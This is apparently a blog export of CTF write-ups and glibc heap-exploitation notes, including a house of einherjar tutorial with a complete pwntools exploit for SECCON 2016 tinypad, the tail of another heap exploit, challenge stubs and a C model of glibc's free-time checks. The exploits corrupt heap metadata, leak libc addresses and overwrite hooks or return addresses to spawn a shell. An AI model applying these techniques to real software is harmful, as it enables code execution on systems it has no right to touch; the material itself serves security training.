addr: '</span>,<span class="built_in">str</span>(((heap_base+<span class="number">0x2e1</span>)*<span class="number">10</span>)))</span><br><span class="line"></span><br><span class="line">studenttoTeacher()</span><br><span class="line">add(<span class="number">2</span>)</span><br><span class="line">write_a_review_first(<span class="number">1</span>,<span class="number">0x80</span>,<span class="string">'b'</span>*<span class="number">0x10</span>)</span><br><span class="line">target_addr = heap_base + <span class="number">0x10</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x31</span>)</span><br><span class="line">payload += p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span> + p64(<span class="number">0x21</span>)</span><br><span class="line">payload += p64(<span class="number">2</span>) + p64(target_addr)</span><br><span class="line">payload += p64(<span class="number">0x100</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'\xff'</span>*<span class="number">0x20</span></span><br><span class="line">write_a_review(<span class="number">1</span>,payload)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x31</span>)</span><br><span class="line">payload += p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span> + p64(<span class="number">0x21</span>)</span><br><span class="line">payload += p64(<span class="number">2</span>) + p64(heap_base+<span class="number">0x360</span>)</span><br><span class="line">payload += p64(<span 
class="number">0x100</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">add(<span class="number">3</span>)</span><br><span class="line">parent(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x18</span> + p64(<span class="number">0x31</span>) + p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(<span class="number">0x21</span>) + p64(<span class="number">2</span>) + p64(heap_base+<span class="number">0x2b8</span>) + p64(<span class="number">0x110</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">write_a_review(<span class="number">2</span>,p64(<span class="number">0</span>))</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_changeid(<span class="number">2</span>)</span><br><span class="line">student_check()</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) + <span class="number">0x66</span></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">one = libc_base + <span class="number">0xe3b31</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0xe3b2e execve("/bin/sh", r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == 
NULL</span></span><br><span class="line"><span class="string"> [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b31 execve("/bin/sh", r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b34 execve("/bin/sh", rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line"></span><br><span class="line">studenttoTeacher()</span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x18</span> + p64(<span class="number">0x31</span>) + p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(<span class="number">0x21</span>) + p64(<span class="number">2</span>) + p64(malloc_hook) + p64(<span class="number">0x110</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">write_a_review(<span class="number">2</span>,p64(one))</span><br><span class="line">cmd(<span class="number">6</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span 
class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="babynote"><a href="#babynote" class="headerlink" title="babynote"></a>babynote</h1><blockquote>
<p>It’s just a traditional challenge<br>nc 123.60.76.240 60001</p>
</blockquote>
<p>一个musl的题目</p>
<h2 id="libc-so"><a href="#libc-so" class="headerlink" title="libc.so"></a>libc.so</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br><span class="line">Usage: ./libc.so [options] [--] pathname [args]</span><br></pre></td></tr></table></figure>
<h2 id="musl启动方法"><a href="#musl启动方法" class="headerlink" title="musl启动方法"></a>Running the musl binary</h2><p>Use the <code>libc.so</code> shipped with the challenge directly as the program loader:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./libc.so ./babynote</span><br></pre></td></tr></table></figure>
<p>In the exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">p = process([<span class="string">"./libc.so"</span>,<span class="string">'./babynote'</span>])</span><br></pre></td></tr></table></figure>
<h2 id="musl-pwn基础"><a href="#musl-pwn基础" class="headerlink" title="musl pwn基础"></a>musl pwn basics</h2><p>Not written yet…</p>
<h1 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h1><blockquote>
<p>$ ping 123.60.8.251<br>PING 123.60.8.251 (123.60.8.251): 56 data bytes<br>64 bytes from 123.60.8.251: icmp_seq=0 ttl=39 time=20.397 ms<br>64 bytes from 123.60.8.251: icmp_seq=1 ttl=39 time=18.976 ms<br>64 bytes from 123.60.8.251: icmp_seq=2 ttl=39 time=20.381 ms<br>64 bytes from 123.60.8.251: icmp_seq=3 ttl=39 time=18.297 ms<br>64 bytes from 123.60.8.251: icmp_seq=4 ttl=39 time=20.751 ms</p>
<p>mirror server: 20.239.70.121</p>
</blockquote>
<h1 id="babyarm"><a href="#babyarm" class="headerlink" title="babyarm"></a>babyarm</h1><blockquote>
<p>It is so simple, simplest, cannot be simpler…</p>
<p><a href="https://drive.google.com/file/d/1urPkXtXQvgbuoiC12wlJ9Kp6U1B8frTu/view?usp=sharing">Download Link</a></p>
<p>nc 124.70.158.154 60001</p>
</blockquote>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>XCTF-SUSCTF2022</title>
<url>/article/XCTF-SUSCTF2022/</url>
<content><![CDATA[<h1 id="XCTF-SUSCTF2022"><a href="#XCTF-SUSCTF2022" class="headerlink" title="XCTF-SUSCTF2022"></a>XCTF-SUSCTF2022</h1><span id="more"></span>
<h1 id="happytree"><a href="#happytree" class="headerlink" title="happytree"></a>happytree</h1><p>checksec </p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">Arch: amd64-64-little</span><br><span class="line">RELRO: Full RELRO</span><br><span class="line">Stack: Canary found</span><br><span class="line">NX: NX enabled</span><br><span class="line">PIE: PIE enabled</span><br></pre></td></tr></table></figure>
<p>To be written…</p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>house of einherjar</title>
<url>/article/house%20of%20einherjar/</url>
<content><![CDATA[<h1 id="house-of-einherjar"><a href="#house-of-einherjar" class="headerlink" title="house of einherjar"></a>house of einherjar</h1><h1 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h1><p><code>free</code> 函数后向(向低地址)合并操作</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">/* consolidate backward */</span></span><br><span class="line"><span class="keyword">if</span> (!prev_inuse(p)) {</span><br><span class="line"> prevsize = prev_size(p);</span><br><span class="line"> size += prevsize;</span><br><span class="line"> p = chunk_at_offset(p, -((<span class="keyword">long</span>) prevsize));</span><br><span class="line"> unlink(av, p, bck, fwd);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>While we are at it, here is the <code>unlink</code> source:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> unlink(AV, P, BK, FD) { \</span></span><br><span class="line"> FD = P->fd; \</span><br><span class="line"> BK = P->bk; \</span><br><span class="line"> <span class="keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, <span class="number">0</span>)) \</span><br><span class="line"> malloc_printerr (check_action, <span class="string">"corrupted double-linked list"</span>, P, AV); \</span><br><span class="line"> <span class="keyword">else</span> { \</span><br><span class="line"> FD->bk = BK; \</span><br><span class="line"> BK->fd = FD; \</span><br><span class="line"> <span class="keyword">if</span> (!in_smallbin_range (P->size) \</span><br><span class="line"> && __builtin_expect (P->fd_nextsize != <span class="literal">NULL</span>, <span class="number">0</span>)) { \</span><br><span class="line"> <span class="keyword">if</span> (__builtin_expect (P->fd_nextsize->bk_nextsize != P, <span class="number">0</span>) \</span><br><span class="line"> || __builtin_expect (P->bk_nextsize->fd_nextsize != P, <span class="number">0</span>)) \</span><br><span class="line"> malloc_printerr (check_action, \</span><br><span class="line"> <span class="string">"corrupted double-linked list (not small)"</span>, \</span><br><span class="line"> P, AV); \</span><br><span class="line"> <span class="keyword">if</span> (FD->fd_nextsize == <span class="literal">NULL</span>) { \</span><br><span class="line"> <span class="keyword">if</span> (P->fd_nextsize == P) \</span><br><span class="line"> FD->fd_nextsize = FD->bk_nextsize = FD; \</span><br><span class="line"> <span class="keyword">else</span> { \</span><br><span class="line"> FD->fd_nextsize = P->fd_nextsize; \</span><br><span class="line"> FD->bk_nextsize = P->bk_nextsize; \</span><br><span class="line"> P->fd_nextsize->bk_nextsize = FD; \</span><br><span class="line"> 
P->bk_nextsize->fd_nextsize = FD; \</span><br><span class="line"> } \</span><br><span class="line"> } <span class="keyword">else</span> { \</span><br><span class="line"> P->fd_nextsize->bk_nextsize = P->bk_nextsize; \</span><br><span class="line"> P->bk_nextsize->fd_nextsize = P->fd_nextsize; \</span><br><span class="line"> } \</span><br><span class="line"> } \</span><br><span class="line"> } \</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>Conditions for exploitation</h2><ul>
<li>A heap overflow or off-by-null bug lets us clear the <code>prev_inuse</code> bit of the higher-address chunk (stack overflow / off-by-one).</li>
<li>During backward (lower-address) consolidation, the location of the new chunk is determined by <code>chunk_at_offset(p, -((long) prevsize))</code>.</li>
<li>The <code>fd</code> and <code>bk</code> of <code>fake_chunk</code> are set to the address of <code>fake_chunk</code> itself, so that the unlink check passes.</li>
<li>We need the difference between the target chunk and the address of p1, so an address leak is required.</li>
<li>We need to build a matching fake chunk near the target chunk in order to pass the unlink check.</li>
</ul>
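<p>As an added example (my own model, not code from the page or from glibc), the following C program runs the backward-consolidation branch and the unlink check quoted above on a constructed memory image, and also applies the size-vs-prev_size check that glibc 2.29 performs while consolidating, which is the check that catches this layout on newer libcs. The function and variable names are my own.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PREV_INUSE 0x1
#define SIZE_BITS  0x7

/* Header layout of glibc's malloc_chunk; fd/bk are only meaningful when free. */
typedef struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
} chunk_t;

static size_t chunksize(const chunk_t *p) { return p->size & ~(size_t)SIZE_BITS; }
static int prev_inuse(const chunk_t *p) { return (int)(p->size & PREV_INUSE); }
static chunk_t *chunk_at_offset(chunk_t *p, long off) { return (chunk_t *)((char *)p + off); }

typedef enum { NO_CONSOLIDATE, CONSOLIDATED, ABORT_UNLINK, ABORT_SIZE_MISMATCH } free_result_t;

/* Mirrors the "consolidate backward" branch of _int_free and the double-linked
 * list check inside unlink() quoted above (glibc 2.23 behaviour). With
 * modern != 0 the check glibc 2.29 added before unlinking,
 * "corrupted size vs. prev_size while consolidating", is applied as well. */
free_result_t consolidate_backward(chunk_t *p, int modern, chunk_t **merged)
{
    *merged = NULL;
    if (prev_inuse(p))
        return NO_CONSOLIDATE;               /* previous chunk in use: nothing to merge */

    size_t prevsize = p->prev_size;          /* the field the off-by-null bug lets an attacker set */
    chunk_t *prev = chunk_at_offset(p, -((long)prevsize));
    if (modern && chunksize(prev) != prevsize)
        return ABORT_SIZE_MISMATCH;          /* 2.29+: prev's own size field must agree */

    /* unlink(av, prev, bck, fwd): FD->bk and BK->fd must both point back at prev */
    chunk_t *fd = prev->fd, *bk = prev->bk;
    if (fd->bk != prev || bk->fd != prev)
        return ABORT_UNLINK;                 /* "corrupted double-linked list" */
    fd->bk = bk;
    bk->fd = fd;
    *merged = prev;
    return CONSOLIDATED;
}

/* Constructed memory image (not a real heap): a fake chunk at fake_off whose fd/bk
 * either point to itself, as in the page's fake_chunk, or to a zeroed bystander,
 * and a victim chunk at victim_off whose prev_size is the distance between them
 * and whose PREV_INUSE bit is clear. */
unsigned char model_mem[0x400] __attribute__((aligned(16)));
long last_merged_off = -1;                   /* offset of the merged chunk in model_mem, or -1 */

int run_case(size_t fake_off, size_t victim_off, size_t fake_size, int self_linked, int modern)
{
    memset(model_mem, 0, sizeof model_mem);
    chunk_t *fake = (chunk_t *)(model_mem + fake_off);
    chunk_t *victim = (chunk_t *)(model_mem + victim_off);
    chunk_t *other = (chunk_t *)(model_mem + sizeof model_mem - 0x40);
    fake->size = fake_size;
    fake->fd = self_linked ? fake : other;
    fake->bk = self_linked ? fake : other;
    victim->prev_size = victim_off - fake_off;   /* like offset = chunk2 - fake_chunk_addr */
    victim->size = 0x100;                         /* PREV_INUSE clear: prev looks free */

    chunk_t *merged;
    int result = consolidate_backward(victim, modern, &merged);
    last_merged_off = merged ? (long)((unsigned char *)merged - model_mem) : -1;
    return result;
}

int main(void)
{
    static const char *names[] = {
        "no consolidation", "consolidated into prev",
        "abort: corrupted double-linked list", "abort: size vs. prev_size mismatch"
    };
    int r = run_case(0x20, 0x220, 0x101, 1, 0);
    printf("2.23, self-linked fake chunk: %s (merged at +0x%lx)\n", names[r], last_merged_off);
    r = run_case(0x20, 0x220, 0x101, 0, 0);
    printf("2.23, fd/bk not pointing back: %s\n", names[r]);
    r = run_case(0x20, 0x220, 0x101, 1, 1);
    printf("2.29, same fake chunk (size 0x101 != prev_size 0x200): %s\n", names[r]);
    return 0;
}
```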
<h1 id="2016-Seccon-tinypad"><a href="#2016-Seccon-tinypad" class="headerlink" title="2016 Seccon tinypad"></a>2016 Seccon tinypad</h1><p>The program has an <code>off-by-null</code> bug.</p>
<h2 id="exp详解"><a href="#exp详解" class="headerlink" title="exp详解"></a>Exploit walkthrough</h2><p>The address-leak part is not analysed in detail; the analysis starts from the chunk allocations for <code>house of einherjar</code>.</p>
<h3 id="1-堆块分配"><a href="#1-堆块分配" class="headerlink" title="1.堆块分配"></a>1. Chunk allocation</h3><p>chunk1 is used to modify chunk2's prev_size field and prev_inuse bit.</p>
<p>chunk3 and chunk4 mainly serve to fill the program's own buffer area.</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">add(<span class="number">0x18</span>,<span class="string">'a'</span>*<span class="number">0x18</span>) <span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'b'</span>*<span class="number">0xf8</span> + <span class="string">'\x11'</span>) <span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'c'</span>*<span class="number">0xf8</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'d'</span>*<span class="number">0xf8</span>) <span class="comment">#4</span></span><br></pre></td></tr></table></figure>
<p>The exploit has two parts. The first is to build a fake_chunk at target_addr (chosen as tinypad+0x20). The second is to write chunk2's prev_size field and prev_inuse bit.</p>
<h3 id="2-构造-fake-chunk"><a href="#2-构造-fake-chunk" class="headerlink" title="2.构造 fake_chunk"></a>2. Build the fake_chunk</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x20</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br></pre></td></tr></table></figure>
<h3 id="3-写-chunk2-字段"><a href="#3-写-chunk2-字段" class="headerlink" title="3.写 chunk2 字段"></a>3. Write chunk2's fields</h3><p>Before that we need to compute the distance from chunk2 to tinypad+0x20:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">tinypad = <span class="number">0x602040</span></span><br><span class="line">fake_chunk_addr = tinypad + <span class="number">0x20</span></span><br><span class="line">fd = fake_chunk_addr</span><br><span class="line">bk = fake_chunk_addr</span><br><span class="line">offset = chunk2 - fake_chunk_addr</span><br></pre></td></tr></table></figure>
<p>Write the crafted chunk2 fields through the program's strcpy, then free(2).</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x14</span> + p64(offset)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> payload = <span class="string">'a'</span>*(<span class="number">0x13</span>-i) + p64(offset)</span><br><span class="line"> edit(<span class="number">1</span>,payload)</span><br><span class="line">free(<span class="number">2</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20einherjar/image-20211130105542360.png" alt="image-20211130105542360"></p>
<p>The next allocated chunk of size 0xf0 lands at 0x602060.</p>
<p><img src="/article/house%20of%20einherjar/image-20211130105718209.png" alt="image-20211130105718209"></p>
<h3 id="4-修复-fake-chunk"><a href="#4-修复-fake-chunk" class="headerlink" title="4.修复 fake_chunk"></a>4. Repair the fake_chunk</h3><p>Before allocating a chunk we need to repair the fake_chunk's size, fd and bk;</p>
<p>fd and bk must point to the unsorted bin (the malloc_hook+0x10+88 value used below).</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x20</span> </span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)*<span class="number">2</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br></pre></td></tr></table></figure>
<p>Then write a payload that modifies the pointers in tinypad_array.</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload = <span class="string">'f'</span> * (<span class="number">0x100</span> - <span class="number">0x20</span> - <span class="number">0x10</span>) + p64(<span class="number">0x18</span>) + p64(environ) + p64(<span class="number">0xf0</span>) + p64(<span class="number">0x602148</span>)</span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br></pre></td></tr></table></figure>
<h3 id="5-修改-main-函数的返回地址为-one-gadget-地址获取-shell"><a href="#5-修改-main-函数的返回地址为-one-gadget-地址获取-shell" class="headerlink" title="5.修改 main 函数的返回地址为 one_gadget 地址获取 shell"></a>5. Overwrite main's return address with the one_gadget address to get a shell</h3><p>First locate 0x7f9afca72840 (__libc_start_main+240) on the stack, then compute the offset from it.</p>
<p><img src="/article/house%20of%20einherjar/image-20211130120204305.png" alt="image-20211130120204305"></p>
<p><img src="/article/house%20of%20einherjar/image-20211130120604059.png" alt="image-20211130120604059"></p>
<p><img src="/article/house%20of%20einherjar/image-20211130120609788.png" alt="image-20211130120609788"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">offset = environ_addr - (__libc_start_main+<span class="number">240</span>)</span><br><span class="line"></span><br><span class="line">main_ret = environ_addr - offset</span><br></pre></td></tr></table></figure>
<p>chunk2 -> chunk1: use chunk2 to make chunk1 point at main_ret, then use chunk1 to overwrite main_ret with one_gadget.</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">edit(<span class="number">2</span>,p64(main_ret))</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20einherjar/image-20211130121532715.png" alt="image-20211130121532715"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">edit(<span class="number">1</span>,p64(one_gadget))</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20einherjar/image-20211130121818300.png" alt="image-20211130121818300"></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'tinypad'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = 
ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'(CMD)>>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="string">'A'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'(SIZE)>>> '</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'(CONTENT)>>> '</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="string">'E'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'(INDEX)>>> '</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'(CONTENT)>>> '</span>,content) </span><br><span class="line"> p.sendlineafter(<span class="string">'(Y/n)>>> '</span>,<span class="string">'Y'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="string">'D'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'(INDEX)>>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment"># BEGIN leak</span></span><br><span 
class="line">add(<span class="number">0x70</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'c'</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">' # CONTENT: '</span>)</span><br><span class="line">chunk1 = u64(p.recv(<span class="number">4</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x80</span></span><br><span class="line">chunk2 = chunk1 + <span class="number">0x20</span></span><br><span class="line">log.success(<span class="string">'chunk1: '</span> + <span class="built_in">hex</span>(chunk1))</span><br><span class="line"></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x10</span> - <span class="number">88</span> </span><br><span class="line">log.success(<span class="string">'malloc_hook: '</span> + <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">environ = libc_base + libc.sym[<span class="string">'__environ'</span>]</span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base))</span><br><span 
class="line">log.success(<span class="string">'system_addr: '</span> + <span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="string">'free_hook: '</span> + <span class="built_in">hex</span>(free_hook))</span><br><span class="line">log.success(<span class="string">'environ: '</span> + <span class="built_in">hex</span>(environ))</span><br><span class="line"><span class="comment"># END leak</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">'a'</span>*<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'b'</span>*<span class="number">0xf8</span> + <span class="string">'\x11'</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'c'</span>*<span class="number">0xf8</span>)</span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'d'</span>*<span class="number">0xf8</span>)</span><br><span class="line"></span><br><span class="line">tinypad = <span class="number">0x602040</span></span><br><span class="line">fake_chunk_addr = tinypad + <span class="number">0x20</span></span><br><span class="line">fd = fake_chunk_addr</span><br><span class="line">bk = fake_chunk_addr</span><br><span class="line">offset = chunk2 - fake_chunk_addr</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x20</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x14</span> + p64(offset)</span><br><span class="line">edit(<span 
class="number">1</span>,payload)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> payload = <span class="string">'a'</span>*(<span class="number">0x13</span>-i) + p64(offset)</span><br><span class="line"> edit(<span class="number">1</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x20</span> </span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>)</span><br><span class="line">payload += p64(malloc_hook+<span class="number">0x10</span>+<span class="number">88</span>)*<span class="number">2</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'f'</span> * (<span class="number">0x100</span> - <span class="number">0x20</span> - <span class="number">0x10</span>) + p64(<span class="number">0x18</span>) + p64(environ) + p64(<span class="number">0xf0</span>) + p64(<span class="number">0x602148</span>)</span><br><span class="line">add(<span class="number">0xf8</span>,payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'# CONTENT: '</span>)</span><br><span class="line">environ_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">main_ret = environ_addr - <span class="number">0xf0</span></span><br><span class="line">one_gadget = libc_base + <span class="number">0x45226</span></span><br><span class="line">log.success(<span class="string">'environ_addr: '</span> + <span class="built_in">hex</span>(environ_addr))</span><br><span 
class="line">log.success(<span class="string">'main_ret: '</span> + <span class="built_in">hex</span>(main_ret))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>,p64(main_ret))</span><br><span class="line">edit(<span class="number">1</span>,p64(one_gadget))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>笔记</category>
</categories>
</entry>
<entry>
<title>house of force</title>
<url>/article/house%20of%20force/</url>
<content><![CDATA[<h1 id="house-of-force"><a href="#house-of-force" class="headerlink" title="house of force"></a>house of force</h1><!-- 文章页 配置 -->
<h2 id="hitcontraining-bamboobox"><a href="#hitcontraining-bamboobox" class="headerlink" title="hitcontraining_bamboobox"></a>hitcontraining_bamboobox</h2><h3 id="基本功能"><a href="#基本功能" class="headerlink" title="基本功能"></a>Basic functionality</h3><ul>
<li>At startup the program allocates a chunk that holds two function pointers.</li>
<li>show </li>
<li>add: the name is read with <code>read</code>, with the user-supplied v2 as the length. Since read's third parameter is unsigned, entering a negative number lets us read an arbitrary length, so there is an <strong>arbitrary-length heap overflow</strong> here.</li>
<li>change: re-enters the length of <code>name</code> before writing, so there is an <strong>arbitrary-length heap overflow</strong> here too.</li>
<li>remove: sets the size of the item's name to 0 and sets the corresponding content to NULL.</li>
<li>magic function: reads the flag and prints it.</li>
</ul>
